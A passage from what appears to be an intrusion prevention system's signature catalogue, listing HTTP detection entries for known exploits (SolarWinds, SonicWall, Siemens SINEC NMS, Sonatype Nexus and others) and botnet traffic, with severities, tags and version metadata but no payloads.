First detected in: sgpkg-ips-192-2032
Last changed: sgpkg-ips-1607-5242
Vulnerability: Microsoft-Sharepoint-Server-Access-Control-Vulnerability
Description:
Back to top

HTTP_CRL-SharePoint-Workflows-XOML-Injection-CVE-2020-0646

About this situation: An attempt to exploit a vulnerability in SharePoint detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Sharepoint, CVE2020, Any Operating System not specific, Microsoft Sharepoint not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1246-5242
Last changed: sgpkg-ips-1862-5242
Vulnerability: SharePoint-Workflows-XOML-Injection-CVE-2020-0646
Description:
Back to top

HTTP_CRL-SHeur4.BHUE-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-691-5211
Vulnerability: Win32.Trojan.SHeur4.BHUE-Botnet
Description:
Back to top

HTTP_CRL-Shopware-Gettemplatename-Local-File-Inclusion

About this situation: An attempt to exploit a vulnerability in Shopware detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Shopware, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-771-5211
Last changed: sgpkg-ips-771-5211
Vulnerability: Shopware-Gettemplatename-Local-File-Inclusion
Description:
Back to top

HTTP_CRL-Siemens-Sinec-NMS-CVE-2021-33733-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Siemens SINEC NMS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Siemens SINEC NMS, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1456-5242
Last changed: sgpkg-ips-1456-5242
Vulnerability: Siemens-Sinec-NMS-CVE-2021-33733-SQL-Injection
Description:
Back to top

HTTP_CRL-Siemens-Sinec-NMS-CVE-2021-37200-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Siemens SINEC NMS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Siemens SINEC NMS, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1398-5242
Last changed: sgpkg-ips-1398-5242
Vulnerability: Siemens-Sinec-NMS-CVE-2021-37200-Directory-Traversal
Description:
Back to top

HTTP_CRL-Siemens-Sinec-NMS-Export-Firmware-Container-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Siemens SINEC NMS detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Siemens SINEC NMS, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1420-5242
Last changed: sgpkg-ips-1420-5242
Vulnerability: Siemens-Sinec-NMS-Export-Firmware-Container-Directory-Traversal
Description:
Back to top

HTTP_CRL-Sierra-Wireless-ALEOS-Acemanager-Cross-Site-Scripting-CVE-2023-40461

About this situation: An attempt to exploit a vulnerability in ALEOS ACEManager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ALEOS, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1664-5242
Last changed: sgpkg-ips-1664-5242
Vulnerability: Sierra-Wireless-ALEOS-Acemanager-Cross-Site-Scripting-CVE-2023-40461
Description:
Back to top

HTTP_CRL-Sierra-Wireless-ALEOS-Acemanager-Denial-Of-Service-CVE-2023-40459

About this situation: An attempt to exploit a vulnerability in ALEOS ACEManager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ALEOS, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1663-5242
Last changed: sgpkg-ips-1663-5242
Vulnerability: Sierra-Wireless-ALEOS-Acemanager-Denial-Of-Service-CVE-2023-40459
Description:
Back to top

HTTP_CRL-Simda.bqz-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-694-5211
Vulnerability: Win32.Trojan.Simda.bqz-Botnet
Description:
Back to top

HTTP_CRL-SimpleBBS-Name-Argument-Remote-Code-Execution

About this situation: Detects SimpleBBS php injection exploits
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, SimpleBBS, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-48-1210
Last changed: sgpkg-ips-158-2032
Vulnerability: HTTP-SimpleBBS-Name-Argument-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-SimplestGuest-Command-Execution

About this situation: Command execution attempt against simplestguest.cgi script
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Leif M. Wright simplestguest.cgi, CVE2001, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-514-5211
Vulnerability: HTTP-SimplestGuest-Command-Execution
Description:
Back to top

HTTP_CRL-Siretta-Quartz-Gold-Router-OS-Command-Injection

About this situation: An attempt to exploit a vulnerability in Siretta QUARTZ-GOLD detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Siretta QUARTZ-GOLD, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1650-5242
Last changed: sgpkg-ips-1650-5242
Vulnerability: Siretta-Quartz-Gold-Router-OS-Command-Injection
Description:
Back to top

HTTP_CRL-Siretta-Quartz-Gold-Router-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Siretta QUARTZ-GOLD detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Siretta QUARTZ-GOLD, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1650-5242
Last changed: sgpkg-ips-1650-5242
Vulnerability: Siretta-Quartz-Gold-Router-Stack-Buffer-Overflow
Description:
Back to top

HTTP_CRL-Sitecom-Home-Storage-Center-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Sitecom Home Storage Center detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Sitecom Home Storage Center, Any Operating System not specific, Disclosure, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: Sitecom-Home-Storage-Center-Directory-Traversal
Description:
Back to top

HTTP_CRL-Skyworth-GPON-HomeGateways-And-Optical-Network-Terminals-Stack-Overflow

About this situation: An attempt to exploit a vulnerability in a Shenzhen Skyworth device detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Shenzhen Skyworth, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1771-5242
Last changed: sgpkg-ips-1771-5242
Vulnerability: Skyworth-GPON-HomeGateways-And-Optical-Network-Terminals-Stack-Overflow
Description:
Back to top

HTTP_CRL-Smart-Software-Solutions-Codesys-Controlservice-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Smart Software Solutions CoDeSys Controlservice detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Smart Software Solutions CoDeSys, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1330-5242
Vulnerability: Smart-Software-Solutions-Codesys-Controlservice-Stack-Buffer-Overflow
Description:
Back to top

HTTP_CRL-Smartstore-Smartstorenet-Forumpost-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in smartstore SmartStoreNET detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, SmartStoreNET, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1411-5242
Last changed: sgpkg-ips-1411-5242
Vulnerability: Smartstore-Smartstorenet-Forumpost-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Smartstore-Smartstorenet-Privatemessages-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in smartstore SmartStoreNET detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, SmartStoreNET, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1412-5242
Last changed: sgpkg-ips-1412-5242
Vulnerability: Smartstore-Smartstorenet-Privatemessages-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Smarty-Template-Engine-Sandbox-Escape-CVE-2021-26119

About this situation: An attempt to exploit a vulnerability in Smarty detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Smarty, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1852-5242
Last changed: sgpkg-ips-1852-5242
Vulnerability: Smarty-Template-Engine-Sandbox-Escape-CVE-2021-26119
Description:
Back to top

HTTP_CRL-Smoaler.B-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-1589-5242
Vulnerability: Win32.Trojan.Smoaler-Botnet
Description:
Back to top

HTTP_CRL-Smoaler.C-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-690-5211
Last changed: sgpkg-ips-1272-5242
Vulnerability: Win32.Trojan.Smoaler-Botnet
Description:
Back to top

HTTP_CRL-SMSreg-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Android, Any Hardware, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-694-5211
Vulnerability: Android.Trojan.SMSreg-Botnet
Description:
Back to top

HTTP_CRL-Solarview-Compact-Command-Injection-CVE-2022-29303

About this situation: An attempt to exploit a vulnerability in SolarView Compact detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, SolarView, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1529-5242
Last changed: sgpkg-ips-1529-5242
Vulnerability: Solarview-Compact-Command-Injection-CVE-2022-29303
Description:
Back to top

HTTP_CRL-Solarview-Compact-Command-Injection-CVE-2023-23333

About this situation: An attempt to exploit a vulnerability in SolarView Compact detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, SolarView, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1625-5242
Last changed: sgpkg-ips-1625-5242
Vulnerability: Solarview-Compact-Command-Injection-CVE-2023-23333
Description:
Back to top

HTTP_CRL-Solarwinds-Network-Configuration-Manager-Arbitrary-File-Write

About this situation: An attempt to exploit a vulnerability in SolarWinds Network Configuration Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Network Configuration Manager, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1316-5242
Last changed: sgpkg-ips-1481-5242
Vulnerability: Solarwinds-Network-Configuration-Manager-Arbitrary-File-Write
Description:
Back to top

HTTP_CRL-Solarwinds-Network-Performance-Monitor-Fromjson-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in SolarWinds Network Performance Monitor (NPM) detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Network Performance Monitor (NPM), CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1366-5242
Last changed: sgpkg-ips-1391-5242
Vulnerability: Solarwinds-Network-Performance-Monitor-Fromjson-Insecure-Deserialization
Description:
Back to top

HTTP_CRL-Solarwinds-Network-Performance-Monitor-Updateactionsdescriptions-SQL-Injection

About this situation: An attempt to exploit a vulnerability in SolarWinds Network Performance Monitor (NPM) detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Network Performance Monitor (NPM), CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1545-5242
Last changed: sgpkg-ips-1545-5242
Vulnerability: Solarwinds-Network-Performance-Monitor-Updateactionsdescriptions-SQL-Injection
Description:
Back to top

HTTP_CRL-Solarwinds-NPM-DeserializeFromStrippedXml-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in SolarWinds Network Performance Monitor detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Network Performance Monitor (NPM), CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1554-5242
Last changed: sgpkg-ips-1554-5242
Vulnerability: Solarwinds-NPM-DeserializeFromStrippedXml-Insecure-Deserialization
Description:
Back to top

HTTP_CRL-Solarwinds-Orion-Ipam-Reflected-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in SolarWinds Orion IPAM detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Orion IPAM, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-499-5211
Last changed: sgpkg-ips-499-5211
Vulnerability: Solarwinds-Orion-Ipam-Reflected-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Solarwinds-Orion-Patch-Manager-Edittopxx-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in SolarWinds Patch Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Patch Manager, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1408-5242
Last changed: sgpkg-ips-1408-5242
Vulnerability: Solarwinds-Orion-Patch-Manager-Edittopxx-Insecure-Deserialization
Description:
Back to top

HTTP_CRL-Solarwinds-Orion-Patch-Manager-Wsasyncexecutetasks.aspx-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in SolarWinds Patch Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Patch Manager, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1409-5242
Last changed: sgpkg-ips-1409-5242
Vulnerability: Solarwinds-Orion-Patch-Manager-Wsasyncexecutetasks.aspx-Insecure-Deserialization
Description:
Back to top

HTTP_CRL-Solarwinds-Serv-U-FTP-Server-User_Full_Name-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in SolarWinds Serv-U FTP Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Serv-U FTP Server, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1213-5242
Last changed: sgpkg-ips-1213-5242
Vulnerability: Solarwinds-Serv-U-FTP-Server-User_Full_Name-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Solarwinds-Srm-Profiler-Backupassociationservlet-Add-SQL-Injection

About this situation: An attempt to exploit a vulnerability in SolarWinds Storage Manager detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, SolarWinds Storage Manager, CVE2016, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-818-5242
Last changed: sgpkg-ips-1013-5242
Vulnerability: Solarwinds-Srm-Profiler-Backupassociationservlet-Add-SQL-Injection
Description:
Back to top

HTTP_CRL-Solarwinds-Srm-Profiler-Backupexceptionsservlet-SQL-Injection

About this situation: An attempt to exploit a vulnerability in SolarWinds Storage Manager detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, SolarWinds Storage Manager, CVE2016, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-761-5211
Last changed: sgpkg-ips-1013-5242
Vulnerability: Solarwinds-Srm-Profiler-Backupexceptionsservlet-SQL-Injection
Description:
Back to top

HTTP_CRL-Solarwinds-Srm-Profiler-Bexdriveusagesummaryservlet-SQL-Injection

About this situation: An attempt to exploit a vulnerability in SolarWinds Storage Manager detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, SolarWinds Storage Manager, CVE2016, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-768-5211
Last changed: sgpkg-ips-1013-5242
Vulnerability: Solarwinds-Srm-Profiler-Bexdriveusagesummaryservlet-SQL-Injection
Description:
Back to top

HTTP_CRL-Solarwinds-Srm-Profiler-Duplicatefilesservlet-SQL-Injection

About this situation: An attempt to exploit a vulnerability in SolarWinds Storage Manager detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, SolarWinds Storage Manager, CVE2016, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-767-5211
Last changed: sgpkg-ips-1013-5242
Vulnerability: Solarwinds-Srm-Profiler-Duplicatefilesservlet-SQL-Injection
Description:
Back to top

HTTP_CRL-Solarwinds-Srm-Profiler-Fileactionassignmentservlet-Assignednames-SQL-Injection

About this situation: An attempt to exploit a vulnerability in SolarWinds Storage Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Storage Manager, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-809-5242
Last changed: sgpkg-ips-870-5242
Vulnerability: Solarwinds-Srm-Profiler-Fileactionassignmentservlet-Assignednames-SQL-Injection
Description:
Back to top

HTTP_CRL-Solarwinds-Srm-Profiler-Hoststorageservlet-State-Filesystem-Id-SQL-Injection

About this situation: An attempt to exploit a vulnerability in SolarWinds Storage Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Storage Manager, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-771-5211
Last changed: sgpkg-ips-771-5211
Vulnerability: Solarwinds-Srm-Profiler-Hoststorageservlet-State-Filesystem-Id-SQL-Injection
Description:
Back to top

HTTP_CRL-Solarwinds-Srm-Profiler-Nbuerrormessageservlet-Exitcode-SQL-Injection

About this situation: An attempt to exploit a vulnerability in SolarWinds Storage Manager detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, SolarWinds Storage Manager, CVE2016, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-773-5211
Last changed: sgpkg-ips-1272-5242
Vulnerability: Solarwinds-Srm-Profiler-Nbuerrormessageservlet-Exitcode-SQL-Injection
Description:
Back to top

HTTP_CRL-Solarwinds-Srm-Profiler-Rulesmetadata-Addnewrule-SQL-Injection

About this situation: An attempt to exploit a vulnerability in SolarWinds Storage Manager detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, SolarWinds Storage Manager, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-775-5211
Last changed: sgpkg-ips-1013-5242
Vulnerability: Solarwinds-Srm-Profiler-Rulesmetadata-Addnewrule-SQL-Injection
Description:
Back to top

HTTP_CRL-Solarwinds-Srm-Profiler-Scriptservlet-Scriptschedule-SQL-Injection

About this situation: An attempt to exploit a vulnerability in SolarWinds Storage Manager detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, SolarWinds Storage Manager, CVE2016, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-765-5211
Last changed: sgpkg-ips-1013-5242
Vulnerability: Solarwinds-Srm-Profiler-Scriptservlet-Scriptschedule-SQL-Injection
Description:
Back to top

HTTP_CRL-Solarwinds-Srm-Profiler-Scriptservlet-State-SQL-Injection

About this situation: An attempt to exploit a vulnerability in SolarWinds Storage Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Storage Manager, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-769-5211
Last changed: sgpkg-ips-774-5211
Vulnerability: Solarwinds-Srm-Profiler-Scriptservlet-State-SQL-Injection
Description:
Back to top

HTTP_CRL-Solarwinds-Srm-Profiler-Userdefinedfieldconfigservlet-Saveudf-SQL-Injection

About this situation: An attempt to exploit a vulnerability in SolarWinds Storage Manager detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, SolarWinds Storage Manager, CVE2016, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-813-5242
Last changed: sgpkg-ips-1013-5242
Vulnerability: Solarwinds-Srm-Profiler-Userdefinedfieldconfigservlet-Saveudf-SQL-Injection
Description:
Back to top

HTTP_CRL-Solarwinds-Srm-Profiler-Windowseventlogsservlet-SQL-Injection

About this situation: An attempt to exploit a vulnerability in SolarWinds Storage Manager detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, SolarWinds Storage Manager, CVE2016, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-765-5211
Last changed: sgpkg-ips-1013-5242
Vulnerability: Solarwinds-Srm-Profiler-Windowseventlogsservlet-SQL-Injection
Description:
Back to top

HTTP_CRL-Solarwinds-Srm-Profiler-Xiotechmonitorservlet-Savesite-SQL-Injection

About this situation: An attempt to exploit a vulnerability in SolarWinds Storage Manager detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, SolarWinds Storage Manager, CVE2016, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-812-5242
Last changed: sgpkg-ips-1013-5242
Vulnerability: Solarwinds-Srm-Profiler-Xiotechmonitorservlet-Savesite-SQL-Injection
Description:
Back to top

HTTP_CRL-Solarwinds-Web-Help-Desk-Ajaxproxy-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in SolarWinds Web Help Desk detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Web Help Desk, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1777-5242
Last changed: sgpkg-ips-1777-5242
Vulnerability: Solarwinds-Web-Help-Desk-Ajaxproxy-Insecure-Deserialization
Description:
Back to top

HTTP_CRL-SolusLabs-SolusVM-Centralbackup-SQL-Injection

About this situation: SolusLabs SolusVM SQL injection detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, SolusLabs SolusVM, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-787-5211
Last changed: sgpkg-ips-1343-5242
Vulnerability: SolusLabs-SolusVM-Centralbackup-SQL-Injection
Description:
Back to top

HTTP_CRL-Sonatype-Nexus-Repository-Manager-Contentselectorsapiresource-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Sonatype Nexus Repository Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Sonatype Nexus Repository Manager, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1244-5242
Last changed: sgpkg-ips-1665-5242
Vulnerability: Sonatype-Nexus-Repository-Manager-Contentselectorsapiresource-XSS
Description:
Back to top

HTTP_CRL-Sonatype-Nexus-Repository-Manager-CVE-2019-7238-Expression-Language-Injection

About this situation: An attempt to exploit a vulnerability in Sonatype Nexus Repository Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Sonatype Nexus Repository Manager, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1141-5242
Last changed: sgpkg-ips-1837-5242
Vulnerability: Sonatype-Nexus-Repository-Manager-CVE-2019-7238-Expression-Language-Injection
Description:
Back to top

HTTP_CRL-SonicWall-Command-Injection-CVE-2021-20039

About this situation: An attempt to exploit a vulnerability in SonicWall detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, SonicWall, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1430-5242
Last changed: sgpkg-ips-1433-5242
Vulnerability: SonicWall-Command-Injection-CVE-2021-20039
Description:
Back to top

HTTP_CRL-SonicWall-Gms-And-Analytics-Detectinjection-Security-Filter-Bypass

About this situation: An attempt to exploit a vulnerability in SonicWall Analytics detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, SonicWall GMS, SonicWall Analytics, CVE2023, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1621-5242
Last changed: sgpkg-ips-1621-5242
Vulnerability: SonicWall-Gms-And-Analytics-Detectinjection-SQL-Injection
Description:
Back to top

HTTP_CRL-SonicWall-Gms-And-Analytics-Detectinjection-SQL-Injection

About this situation: An attempt to exploit a vulnerability in SonicWall Analytics detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, SonicWall GMS, SonicWall Analytics, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1621-5242
Last changed: sgpkg-ips-1621-5242
Vulnerability: SonicWall-Gms-And-Analytics-Detectinjection-SQL-Injection
Description:
Back to top

HTTP_CRL-SonicWall-Gms-And-Analytics-Performdownloadtask-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in SonicWall Analytics detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, SonicWall, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1617-5242
